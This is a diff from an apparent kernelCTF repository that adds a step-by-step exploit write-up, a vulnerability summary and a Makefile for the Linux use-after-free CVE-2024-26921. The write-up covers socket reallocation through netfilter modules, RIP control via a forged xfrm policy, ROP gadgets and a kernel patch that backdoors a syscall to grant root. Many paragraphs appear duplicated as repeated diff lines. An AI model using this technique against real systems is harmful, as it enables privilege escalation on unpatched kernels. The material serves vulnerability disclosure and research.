google · lambdasprocket · Dec 21, 2025 · artmetla · Mar 11, 2026 · artmetla
diff --git a/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/docs/exploit.md
@@ -0,0 +1,176 @@
+## Overview
+
+Let's look at what we need to perform the attack.
-Let's look at what we need to perform the attack.
+To exploit this Use-After-Free, we must trigger the bug and overwrite the freed memory entirely within the synchronous execution path of ip_local_out(). The high-level strategy is:
+1. Send a locally generated, fragmented IP packet so ip_send_skb() pushes its sk_buff (skb) into the netfilter hooks via ip_local_out().
+2. Have ip_defrag() process the skb, dropping the final reference to its associated socket (skb->sk) and freeing the socket's memory.
+3. Use a subsequent netfilter hook to immediately allocate over the freed skb->sk memory with our controlled payload.
+4. Let a later netfilter hook dereference the forged skb->sk object to gain execution control.
+
+Let's look at what we need to perform the attack.
-Let's look at what we need to perform the attack.
+To exploit this Use-After-Free, we must trigger the bug and overwrite the freed memory entirely within the synchronous execution path of ip_local_out(). The high-level strategy is:
+1. Send a locally generated, fragmented IP packet so ip_send_skb() pushes its sk_buff (skb) into the netfilter hooks via ip_local_out().
+2. Have ip_defrag() process the skb, dropping the final reference to its associated socket (skb->sk) and freeing the socket's memory.
+3. Use a subsequent netfilter hook to immediately allocate over the freed skb->sk memory with our controlled payload.
+4. Let a later netfilter hook dereference the forged skb->sk object to gain execution control.
+
+Let's look at what we need to perform the attack.
+
+### Socket to send the packet through
+
+Different socket families have different handling of the routing and fragmentation issues.
+We do not want to use upper layer protocols like TCP or UDP, because they perform their own fragmentation and we need to trigger fragmentation at the IP layer.
+
+Second thing to consider is the kmalloc cache used to allocate struct sock. Most socket families have a dedicated cache, but some use a regular kmalloc(), giving us a simple way to reallocate the freed object without performing a cross-cache attack.
+
+And finally, some sockets use a SOCK_RCU_FREE flag which causes sk_destruct() to wait for an RCU grace period before freeing the sock object and this would also make exploitation much harder.
-And finally, some sockets use a SOCK_RCU_FREE flag which causes sk_destruct() to wait for an RCU grace period before freeing the sock object and this would also make exploitation much harder.
+And finally, some sockets use a SOCK_RCU_FREE flag which causes sk_destruct() to wait for an RCU grace period before freeing the sock object. Because the vulnerable "use" happens synchronously later in the exact same netfilter pipeline, an RCU delay means the memory wouldn't actually be returned to the allocator until after the kernel dereferences the dangling pointer. This would make exploitation much harder, as we would need to artificially stall the packet's execution to wait for the grace period.
-And finally, some sockets use a SOCK_RCU_FREE flag which causes sk_destruct() to wait for an RCU grace period before freeing the sock object and this would also make exploitation much harder.
+And finally, some sockets use a SOCK_RCU_FREE flag which causes sk_destruct() to wait for an RCU grace period before freeing the sock object. Because the vulnerable "use" happens synchronously later in the exact same netfilter pipeline, an RCU delay means the memory wouldn't actually be returned to the allocator until after the kernel dereferences the dangling pointer. This would make exploitation much harder, as we would need to artificially stall the packet's execution to wait for the grace period.
+
+The socket family that fulfills all those requirements is AF_PACKET (used for sending raw packets at layer 2).
+
+This means we need to set our own layer 2 and layer 3 headers and choose an output device for the packet.
+No routing will be done, the packet will go straight to the output queue of a selected device.
+
+### Device driver to call ip_local_out()
+
+Because we send our packets at layer 2, ip_send_skb() won't be called and we need to find another way to trigger ip_local_out().
-Because we send our packets at layer 2, ip_send_skb() won't be called and we need to find another way to trigger ip_local_out().
+Because `AF_PACKET` injects frames directly at Layer 2 (skipping the Layer 3 IP output stack entirely), functions like `ip_send_skb()` are bypassed. If sent through a standard interface, our packet would never hit the netfilter hooks. We need an alternative way to force the kernel to pass our crafted `skb` into `ip_local_out()`.
+
+The IPvlan driver provides the perfect mechanism. When processing outbound IPv4 traffic, the driver manually sets up the routing and directly invokes `ip_local_out()`:
-Because we send our packets at layer 2, ip_send_skb() won't be called and we need to find another way to trigger ip_local_out().
+Because `AF_PACKET` injects frames directly at Layer 2 (skipping the Layer 3 IP output stack entirely), functions like `ip_send_skb()` are bypassed. If sent through a standard interface, our packet would never hit the netfilter hooks. We need an alternative way to force the kernel to pass our crafted `skb` into `ip_local_out()`.
+
+The IPvlan driver provides the perfect mechanism. When processing outbound IPv4 traffic, the driver manually sets up the routing and directly invokes `ip_local_out()`:
+Fortunately, it is used by IPvlan driver:
+```
+static int ipvlan_process_v4_outbound(struct sk_buff *skb)
+{
+...
+        skb_dst_set(skb, &rt->dst);
+
+        memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
+
+        err = ip_local_out(net, skb->sk, skb);
+...
+```
+
+So our packets will be sent out of the IPvlan interface.
+IPvlan needs a master ethernet device and we used the veth interface for that.
+
+
+### A way to close the socket fd before the ip_defrag() call
+
+When our packet reaches ip_defrag(), the socket won't be freed if it is still referenced by the open file descriptor.
-When our packet reaches ip_defrag(), the socket won't be freed if it is still referenced by the open file descriptor.
+When our `skb` reaches `ip_defrag()`, the function drops a reference to the socket (`skb->sk`). However, the socket memory is only freed if this drops the reference count (`sk_refcnt`) to zero. If the user-space file descriptor (fd) is still open, it holds an active reference, preventing the allocation from being freed.
-When our packet reaches ip_defrag(), the socket won't be freed if it is still referenced by the open file descriptor.
+When our `skb` reaches `ip_defrag()`, the function drops a reference to the socket (`skb->sk`). However, the socket memory is only freed if this drops the reference count (`sk_refcnt`) to zero. If the user-space file descriptor (fd) is still open, it holds an active reference, preventing the allocation from being freed.
+We can call close() only after sendmsg() returns. The syscall returns after the packets is enqueued to the output device, so we might be able to try a race condition to close the fd in time, but there is a simpler way.
+
+sch_plug queuing discipline can be used to stop the packets from being dequeued from a network device until a command to "unplug" is received through the netlink API.
-sch_plug queuing discipline can be used to stop the packets from being dequeued from a network device until a command to "unplug" is received through the netlink API.
+To achieve deterministic execution, we use the `sch_plug` queuing discipline. `sch_plug` can be attached to a network device to pause its egress queue, holding outbound packets until an explicit "unplug" command is received via the Netlink API. This allows us to cleanly suspend the packet's journey right before it enters the vulnerable `ip_local_out()` path.
-sch_plug queuing discipline can be used to stop the packets from being dequeued from a network device until a command to "unplug" is received through the netlink API.
+To achieve deterministic execution, we use the `sch_plug` queuing discipline. `sch_plug` can be attached to a network device to pause its egress queue, holding outbound packets until an explicit "unplug" command is received via the Netlink API. This allows us to cleanly suspend the packet's journey right before it enters the vulnerable `ip_local_out()` path.
+
+So the steps of our exploit are:
+1. "plug" the ipvlan interface
+2. Send a packet
+3. Close the socket
+4. "unplug" the ipvlan interface
+
+These are actually all the steps needed to exploit the vulnerability, if we exclude the setup needed beforehand.
+
+### Network tools
+
+The exploit needs external iptables and ip (from iproute2 package) binaries to set up rules and network interfaces. 
+These tools are not available in the current kernelCTF root image, so the tar archive with binaries and supporting libraries is attached to the exploit binary as a custom ELF section and extracted using objcopy during execution.
+
+## Triggering the IPv4 fragmentation
+
+The obvious idea is to send the MTU on the outgoing interface (ipv1) to a low value, but then our send() will just return a "Message too long" error.
-The obvious idea is to send the MTU on the outgoing interface (ipv1) to a low value, but then our send() will just return a "Message too long" error.
+The most straightforward approach to force fragmentation would be to set a small Maximum Transmission Unit (MTU) on our initial outgoing interface. However, if we attempt to send a packet larger than the interface's MTU, the `sendmsg()` syscall checks the routing table synchronously and immediately returns an `EMSGSIZE` ("Message too long") error. The packet is dropped before it ever reaches the Netfilter hooks.
-The obvious idea is to send the MTU on the outgoing interface (ipv1) to a low value, but then our send() will just return a "Message too long" error.
+The most straightforward approach to force fragmentation would be to set a small Maximum Transmission Unit (MTU) on our initial outgoing interface. However, if we attempt to send a packet larger than the interface's MTU, the `sendmsg()` syscall checks the routing table synchronously and immediately returns an `EMSGSIZE` ("Message too long") error. The packet is dropped before it ever reaches the Netfilter hooks.
+Instead, we must reroute our packet to another interface with a low MTU (ipv0). This is done using a DNAT rule.
+
+## Triggering ip_defrag()
+
+Because we already have DNAT rules, the conntrack defrag hooks are installed and ip_defrag() will be called for each of our fragments, triggering the release of the sock object at the last fragment.
-Because we already have DNAT rules, the conntrack defrag hooks are installed and ip_defrag() will be called for each of our fragments, triggering the release of the sock object at the last fragment.
+When we configured the `DNAT` rule in the previous step to force routing, the kernel automatically enabled the `conntrack` module to manage the NAT translations. Because `conntrack` relies on transport-layer headers (which are only present in the first fragment) to track connection states, it cannot process fragmented packets. 
+
+To resolve this, Netfilter automatically registers the `ipv4_conntrack_defrag` hook to intercept and reassemble IP fragments *before* they reach the NAT or `conntrack` hooks. 
+
+Therefore, as our dynamically fragmented packets traverse the `OUTPUT` chain, they are caught by this defrag hook. The hook calls `ip_defrag()` to process each fragment. When the final fragment is processed, `ip_defrag()` erroneously drops the final reference to the originating socket (`skb->sk`), freeing the socket object directly into the `kmalloc` cache while the packet continues down the Netfilter pipeline.
-Because we already have DNAT rules, the conntrack defrag hooks are installed and ip_defrag() will be called for each of our fragments, triggering the release of the sock object at the last fragment.
+When we configured the `DNAT` rule in the previous step to force routing, the kernel automatically enabled the `conntrack` module to manage the NAT translations. Because `conntrack` relies on transport-layer headers (which are only present in the first fragment) to track connection states, it cannot process fragmented packets. 
+
+To resolve this, Netfilter automatically registers the `ipv4_conntrack_defrag` hook to intercept and reassemble IP fragments *before* they reach the NAT or `conntrack` hooks. 
+
+Therefore, as our dynamically fragmented packets traverse the `OUTPUT` chain, they are caught by this defrag hook. The hook calls `ip_defrag()` to process each fragment. When the final fragment is processed, `ip_defrag()` erroneously drops the final reference to the originating socket (`skb->sk`), freeing the socket object directly into the `kmalloc` cache while the packet continues down the Netfilter pipeline.
+
+## Reallocating the victim object
+
+To replace the victim object all we have to do is allocate from the kmalloc-2k cache on the same CPU.
+This must be done before all the hooks finish, so there is no way to make them from the user space.
+However, we can use whatever netfilter modules we want. There's a lot of them and some are bound to make new allocations.
+This line of thinking leads us to a TEE target:
+> The TEE target will clone a packet and redirect this clone to another machine on the local network segment.
+
+Cloning a packet sounds great, as it involves copying the data we passed to the send() function.
+There is a problem, though. Our packet's data needs to be larger then than 1024 bytes to be allocated from kmalloc-2k and skb stores larger packets like that using a fragment list. When TEE clones the skb, pskb_copy() is called and only space for the head is allocated from the regular kmalloc, the rest is zero-copied by cloning the fraglist.
+
+Fortunately, some netfilter modules need to look at the whole packet data in one piece (e.g. to search for patterns) instead of dealing with skb fragments.
+
+One such example is a conntrack SIP helper. It calls skb_linearize() which transforms a fragmented skb to linear one, which involves allocating buffer for all the data using kmalloc and copying it there, which finally gives us a way to allocate from kmalloc-2k and overwrite the victim sock object with our data.
-One such example is a conntrack SIP helper. It calls skb_linearize() which transforms a fragmented skb to linear one, which involves allocating buffer for all the data using kmalloc and copying it there, which finally gives us a way to allocate from kmalloc-2k and overwrite the victim sock object with our data.
+One such example is a conntrack SIP helper. Because SIP is a text-based protocol, the helper must search the packet payload for specific string patterns. To do this safely, it cannot deal with fragmented memory pages. Instead, it calls `skb_linearize()`. The skb_linearize() transforms a fragmented skb to linear one, which involves allocating buffer for all the data using kmalloc and copying it there, which finally gives us a way to allocate from kmalloc-2k and overwrite the victim sock object with our data.
-One such example is a conntrack SIP helper. It calls skb_linearize() which transforms a fragmented skb to linear one, which involves allocating buffer for all the data using kmalloc and copying it there, which finally gives us a way to allocate from kmalloc-2k and overwrite the victim sock object with our data.
+One such example is a conntrack SIP helper. Because SIP is a text-based protocol, the helper must search the packet payload for specific string patterns. To do this safely, it cannot deal with fragmented memory pages. Instead, it calls `skb_linearize()`. The skb_linearize() transforms a fragmented skb to linear one, which involves allocating buffer for all the data using kmalloc and copying it there, which finally gives us a way to allocate from kmalloc-2k and overwrite the victim sock object with our data.
+
+To summarize, by combining the TEE and SIP conntrack helper we are able to overwrite the victim sock object that will be used by the netfilter hooks.
+
+## Getting RIP control
+
+Controlling the struct sock object may seem like an instant win at first, but we soon discover that netfilter hooks rarely use the socket context and never call function pointers from that object.
+
+The solution is the ip_route_me_harder() function which is called in the mangle table if some IPv4 parameters like src/dst address, TOS or mark change after mangle rules are executed:
+
+```
+static unsigned int
+ipt_mangle_out(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
+{       
+...
+        /* Save things which could affect route */
+        mark = skb->mark;
+        iph = ip_hdr(skb);
+        saddr = iph->saddr;              
+        daddr = iph->daddr;
+        tos = iph->tos;
+
+        ret = ipt_do_table(priv, skb, state);
+        /* Reroute for ANY change. */
+        if (ret != NF_DROP && ret != NF_STOLEN) {
+                iph = ip_hdr(skb);
+
+                if (iph->saddr != saddr ||
+                    iph->daddr != daddr ||
+                    skb->mark != mark ||
+                    iph->tos != tos) {
+                        err = ip_route_me_harder(state->net, state->sk, skb, RTN_UNSPEC);
+...
+```
+
+state->sk here is the pointer to our sock object.
+
+ip_route_me_harder() calls xfrm_lookup() which examines sk->sk_policy  and if the policy matches the current connection it eventually calls dst_alloc().
+dst_alloc() calls the gc function pointer of the netns_xfrm.dst_ops struct and the netns_xfrm comes from the xfrm policy which is under our control.
+
+So if we are able to craft a valid struct xfrm_policy that matches our connection, we will be able to get RIP control.
+
+This policy is prepared in the prepare_policy(). 
+The fake object for the sock itself is simple - we just need to set the sk_policy pointer and sk_mark value.
+
+The policy object takes a lot of space and has pointer to other objects like netns_xfrm, so we used the [direct mapping storage technique](../../CVE-2024-26923_lts_cos/docs/novel-techniques.md) to place it at a known address in the kernel address space.
+
+## Pivot to ROP
+
+When the gc pointer is called in the dst_alloc() the RDI register contains a pointer to dst_ops which is part of our fake netns_xfrm object.
+
+Following gadgets were used to pivot to the ROP chain placed at dst_ops + 0x10 (our gc pointer is at dst_ops+0x08).
+
+```
+mov    r8,QWORD PTR [rdi+0xc8]
+mov    eax,0x1
+test   r8,r8
+je     ffffffff82185d21
+mov    rsi,rdi
+mov    rcx,r14
+mov    rdi,rbp
+mov    rdx,r15
+call ffffffff82427a60 <__x86_indirect_thunk_r8>
+```
+
+This copies RDI to RSI
+
+```
+push rsi
+jmp qword ptr [rsi + 0x39]
+```
+
+and finally
+
+```
+pop rsp
+pop rbp
+pop rbx
+ret
+```
+
+## Second pivot
+
+To get more room for our ROP chain we move to a second location in the direct mapping using a simple pop rsp ; ret gadget.
+
+## Privilege escalation
+
+Our ROP is executed from the ksoftirqd context, so we can't do a traditional commit_creds() to modify the current process's privileges.
+
+We could try locating our exploit process and changing its privileges, but we decided to go with a different approach - we patch the kernel creating a backdoor that will grant root privileges to any process that executes a given syscall.
+
+We chose a rarely used kexec_file_load() syscall and overwrote its code with our get_root function that does all traditional privileges escalation/namespace escape stuff: commit_creds(init_cred), switch_task_namespaces(pid, init_nsproxy) etc.
+
+This function also returns a special value (0x777) that our user space code can use to detect if the system was already compromised.
+
+Patching the kernel function is done rop_patch_kernel_code() - it calls set_memory_rw() on destination memory and uses copy_user_generic() to write new code there.
diff --git a/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/docs/vulnerability.md
@@ -0,0 +1,65 @@
+## Requirements to trigger the vulnerability
+
+- CAP_NET_ADMIN in a namespace is required
+- Kernel configuration: CONFIG_INET
+- User namespaces required: Yes
+
+## Commit which introduced the vulnerability
+
+https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7026b1ddb6b8d4e6ee33dc2bd06c0ca8746fa7ab
+
+## Commit which fixed the vulnerability
+
+https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=18685451fc4e546fc0e718580d32df3c0e5c8272
+
+## Affected kernel versions
+
+Introduced in 4.1. Fixed in 6.6.25, 5.10.226 and other stable trees.
+
+## Affected component, subsystem
+
+net/ipv4
+
+## Description
+
+ip_local_out() is a function responsible for sending the locally generated IPV4 packets. 
+It will call the NF_INET_LOCAL_OUT netfilter hooks and eventually the dst_output().
+
+The usual call to ip_local_out() looks like this:
+```
+int ip_send_skb(struct net *net, struct sk_buff *skb)
+{
+        int err;
+
+        err = ip_local_out(net, skb->sk, skb);
+        if (err) {
+                if (err > 0)
+                        err = net_xmit_errno(err);
+                if (err)
+                        IP_INC_STATS(net, IPSTATS_MIB_OUTDISCARDS);
+        }
+
+        return err;
+}
+```
+
+Pointer to the socket associated with the skb is passed as an argument to ip_local_out() and then to all the netfilter hooks:
+
+```
+int __ip_local_out(struct net *net, struct sock *sk, struct sk_buff *skb)
+{
+...
+        return nf_hook(NFPROTO_IPV4, NF_INET_LOCAL_OUT,
+                       net, sk, skb, NULL, skb_dst(skb)->dev,
+                       dst_output);
+
+}
+```
+
+skb holds a reference to a socket. In normal conditions, skb is released only after its output path is finished or until the skb is received by the upper layers of the input stack (in scenarios when the outgoing packet is routed back to a local interface).
+This ensures the associated socket is valid while the netfilter hooks are executing.
+
+ip_defrag() is most often called in the input path and it calls skb_orphan()/kfree_skb() on the fragment skb, assuming it is no longer needed.
+However, ip_defrag() can be also called in the output path by the netfilter conntrack hook ipv4_conntrack_defrag().
+
+If that happens, the skb will be released and if it is a last reference to the socket, it will be released as well, causing a use-after-free when next hooks are called and in the ip_finish_output().
diff --git a/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/exploit/cos-97-16919.450.26/Makefile b/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/exploit/cos-97-16919.450.26/Makefile
@@ -0,0 +1,10 @@
+INCLUDES = -I/usr/include/libnl3
+LIBS = -L. -pthread -lnl-cli-3 -lnl-route-3 -lnl-3 -ldl
+CFLAGS = -fomit-frame-pointer -static -fcf-protection=none
+
+exploit: exploit.c kernelver_16919.450.26.h
+	gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)
+	objcopy --add-section tools=tools.tar.gz $@
+
+prerequisites:
+	sudo apt-get install libnl-cli-3-dev libnl-route-3-dev
diff --git a/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/exploit/cos-97-16919.450.26/exploit b/pocs/linux/kernelctf/CVE-2024-26921_lts_cos/exploit/cos-97-16919.450.26/exploit